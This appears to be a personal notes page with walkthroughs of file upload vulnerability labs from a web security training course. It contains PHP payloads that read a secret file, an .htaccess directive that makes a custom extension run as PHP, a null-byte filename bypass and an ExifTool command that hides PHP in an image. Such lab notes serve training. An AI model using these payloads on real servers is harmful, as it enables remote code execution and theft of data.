Vulnerabilities

Exploiting the vulnerabilities...

File Upload Vulnerability

1. If the Apache server detected:

Create a file exploit.php

<?php echo file_get_contents('/home/carlos/secret'); ?>

Find the request that says:

POST /my-account/avatar ...

Change the value of the filename parameter to .htaccess.

Change the value of the Content-Type header to text/plain.

Replace the contents of the file (PHP payload) with the following Apache directive:

AddType application/x-httpd-php .l33t

Change the value of the filename parameter from exploit.php to exploit.l33t. Send the request again

2. Change the file extension by adding at the end of the file:

Request you have to change:

POST /my-account/avatar ...

In the Content-Disposition header, change the value of the filename parameter to include a URL-encoded null byte, followed by the .jpg extension:

filename="exploit.php%00.jpg"

Send the request again:

GET /files/avatars/exploit.php ...

3. If the server is checking for the actual image while uploading the image file

Create an image file containing a PHP payload with the help of ExifTool:

replace the <YOUR-INPUT-IMAGE>.jpg with your image file in the command below:

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

In Burp's proxy history, find the GET /files/avatars/polyglot.php request. Use the message editor's search feature to find the START string somewhere within the binary image data in the response. Between this and the END string.

PreviousOne Liner

Last updated 12 months ago